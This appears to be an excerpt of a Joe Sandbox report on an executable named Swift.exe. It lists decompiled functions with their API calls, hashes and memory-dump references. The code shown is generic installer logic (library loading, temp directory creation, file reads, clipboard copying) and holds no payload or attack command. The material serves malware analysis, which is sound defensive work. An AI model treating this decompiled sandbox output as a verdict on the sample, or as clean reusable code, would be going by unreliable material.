Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ed2607b52eb785e278c14dab091a5b91dc4cc192a25d2990b8513dcf8c98a9c2
Instruction ID: 8a8c29f2d03b2ec2369f2d4c7a19aa3fb826c82f0d6fe6f49d1f8c30c2f95fcc
Opcode Fuzzy Hash: ed2607b52eb785e278c14dab091a5b91dc4cc192a25d2990b8513dcf8c98a9c2
Instruction Fuzzy Hash: 5E01FF31A242209FE7095B389C04B6A3698E751368F10C23BF956F66F1E77CDC029B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F11 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405F11(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409228);
				_t5 = GetModuleHandleA( *(_t10 + 0x409228));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40922c));
				}
				_t5 = E00405EA7(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00405f19
0x00405f1c
0x00405f23
0x00405f2b
0x00405f37
0x00000000
0x00405f3e
0x00405f2e
0x00405f35
0x00000000
0x00405f46
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040315D,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F23
GetProcAddress.KERNEL32(00000000,?), ref: 00405F3E

Part of subcall function 00405EA7: GetSystemDirectoryA.KERNEL32 ref: 00405EBE
Part of subcall function 00405EA7: wsprintfA.USER32 ref: 00405EF7
Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?), ref: 00405F07

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 1ff86fa5640f02b1d9e100387d52f784ab4969e574a7c6b0b5bb7fb3ea5c422e
Instruction ID: 4bd36e2df82f184a24766e614f6339f1b050ed4b19fcf6028d7536f78fafe600
Opcode Fuzzy Hash: 1ff86fa5640f02b1d9e100387d52f784ab4969e574a7c6b0b5bb7fb3ea5c422e
Instruction Fuzzy Hash: B1E08C32A089117AD7209B70AD0497B72A8DB897903010CBEF945F6180D73CEC129EAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040585C Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040585C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405860
0x0040586d
0x00405882
0x00405888

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C78,C:\Users\user\Desktop\Swift.exe,80000000,00000003), ref: 00405860
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405882

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004034FE Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034FE() {
				void* _t1;
				void* _t3;
				void* _t5;
				signed int _t7;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
					_t7 =  *0x409014;
				}
				E00403543();
				_t3 = E004054AA(_t5, _t7, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsk8B1.tmp\\", 7); // executed
				return _t3;
			}

0x004034fe
0x00403506
0x00403509
0x0040350f
0x0040350f
0x0040350f
0x00403516
0x00403522
0x00403527

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403324,00000000), ref: 00403509

Strings

C:\Users\user\AppData\Local\Temp\nsk8B1.tmp\, xrefs: 0040351D

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsk8B1.tmp\
API String ID: 2962429428-3371742900
Opcode ID: 1340b4e1d3ca7adf1d5296a929872824c30d110411a9b65bd84b0f6314efb4cf
Instruction ID: 9681a73b31e58be875917877f7bb3664258c102de6e8bdfab542ef11d9607af5
Opcode Fuzzy Hash: 1340b4e1d3ca7adf1d5296a929872824c30d110411a9b65bd84b0f6314efb4cf
Instruction Fuzzy Hash: 30C0123090460066C6646F799E0B6153A54678173AB500325B1B1F00F3D73C5B51952A

Uniqueness

Uniqueness Score: -1.00%

Function 0040583D Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040583D(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x00405841
0x0040584a
0x00405853
0x00000000
0x00405853
0x00405859

APIs

GetFileAttributesA.KERNELBASE(?,00405648,?,?,?), ref: 00405841
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405853

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
Instruction ID: d05cc4361abf1d29451355e6885ca6d896807bd96f9b1527b3c3db6473f42ffe
Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
Instruction Fuzzy Hash: 6DC04CB1808501ABD6016B34DF4D81F7B66EB50321B108B35F569A01F0CB355C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004053B0 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053B0(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004053b6
0x004053be
0x00000000
0x004053c4
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 004053B6
GetLastError.KERNEL32 ref: 004053C4

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
Instruction ID: 3649bd17f856f05080bd9dc023c015dffea87931ef5ffd4a07dd93f2211ea246
Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
Instruction Fuzzy Hash: DAC04C30A18601EBDA105B30DE08B177EB4AF54781F105535A506E41E0D6B49421DA3E

Uniqueness

Uniqueness Score: -1.00%

Function 00403077 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403077(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040307b
0x0040308e
0x00403096
0x00000000
0x0040309d
0x00000000
0x0040309f

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EC1,000000FF,00000004,00000000,00000000,00000000), ref: 0040308E

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
Instruction ID: 1e7fc65d8f8a97077be7ec0147df88d7087757e0d915cd44d8f1d7b245351477
Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
Instruction Fuzzy Hash: E3E08631101118BBCF105E52AC00EA73B9CEF04362F048432BA04E5190D538DA10DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004030A9 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030A9(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030b7
0x004030bd

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFF,?), ref: 004030B7

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 004056A3 Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056A3(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x004056a3
0x004056b6
0x004056b6
0x004056ba
0x00000000
0x00000000
0x004056ad
0x004056b0
0x00000000
0x004056b0
0x00000000
0x004056ad
0x004056bc

APIs

CharNextA.USER32(?,004031DE,"C:\Users\user\Desktop\Swift.exe",00409188), ref: 004056B0

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction ID: 90b32cf1807eb0abc3aadc6aff18f16f8a5dca112019c1f8e38d421bd3bcd4b0
Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction Fuzzy Hash: 85C0807440D58057E550571084244677FE0AA51340FB48C6BF4C863191C1396C918F3A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404FAF Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404FAF(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x7a1f64; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F43, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x79ed90;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x7a1f4c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x7a2788, 8);
							__eflags =  *0x7a280c - _t149;
							if( *0x7a280c == _t149) {
								E00404E71( *((intOrPtr*)( *0x79e560 + 0x34)), _t149);
							}
							E00403E1A(1);
							goto L25;
						}
						 *0x79e158 = 2;
						E00403E1A(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EA8(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a1f50, _t149);
						ShowWindow(_t154, 8);
						E00403E76(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2790;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a1f50 = GetDlgItem(_a4, 0x403);
				 *0x7a1f48 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a1f64 = _t127;
				_v8 = _t127;
				E00403E76( *0x7a1f50);
				 *0x7a1f54 = E00404713(4);
				 *0x7a1f6c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E41(_a4);
				if(( *0x7a2798 & 0x00000003) != 0) {
					ShowWindow( *0x7a1f50, _t149);
					if(( *0x7a2798 & 0x00000002) != 0) {
						 *0x7a1f50 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E76( *0x7a1f48);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x7a2798 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404fb8
0x00404fbe
0x00404fc7
0x00404fca
0x0040515b
0x00405162
0x00405186
0x00405186
0x0040518c
0x00405199
0x004051b7
0x004051b7
0x004051be
0x00405215
0x00405215
0x00405219
0x00000000
0x00000000
0x0040521b
0x0040521e
0x00000000
0x00000000
0x00405228
0x0040522e
0x00405230
0x00405233
0x0040532c
0x00000000
0x0040532c
0x00405242
0x0040524e
0x00405254
0x00405257
0x0040525a
0x0040526f
0x00405272
0x00405272
0x00405275
0x0040525c
0x00405261
0x00405267
0x0040526a
0x0040526a
0x00405285
0x0040528d
0x0040528e
0x00405290
0x00405299
0x0040529c
0x004052a3
0x004052aa
0x004052b2
0x004052b2
0x004052c0
0x004052c6
0x004052c9
0x004052c9
0x004052d0
0x004052d6
0x004052df
0x004052e6
0x004052ef
0x004052f1
0x004052f4
0x00405303
0x00405305
0x0040530b
0x0040530c
0x0040530d
0x0040530d
0x00405315
0x00405320
0x00405326
0x00405326
0x00000000
0x00405290
0x004051c0
0x004051c6
0x004051f6
0x004051f8
0x004051fe
0x00405209
0x00405209
0x00405210
0x00000000
0x00405210
0x004051ca
0x004051d4
0x00000000
0x0040519b
0x0040519b
0x004051a1
0x004051d9
0x00000000
0x004051e2
0x004051aa
0x004051af
0x004051b2
0x00000000
0x004051b2
0x00405199
0x00404fd0
0x00404fd4
0x00404fdd
0x00404fe4
0x00404fe7
0x00404fea
0x00404fed
0x00404fee
0x00404fef
0x00405008
0x0040500b
0x00405015
0x00405024
0x0040502c
0x00405034
0x00405039
0x0040503c
0x00405048
0x00405051
0x0040505a
0x0040507d
0x00405083
0x00405094
0x00405099
0x004050a7
0x004050b5
0x004050b5
0x004050ba
0x004050c8
0x004050c8
0x004050cd
0x004050d0
0x004050d5
0x004050e1
0x004050ea
0x004050f7
0x00405106
0x004050f9
0x004050fe
0x004050fe
0x00405112
0x00405112
0x00405126
0x0040512f
0x00405138
0x00405148
0x00405154
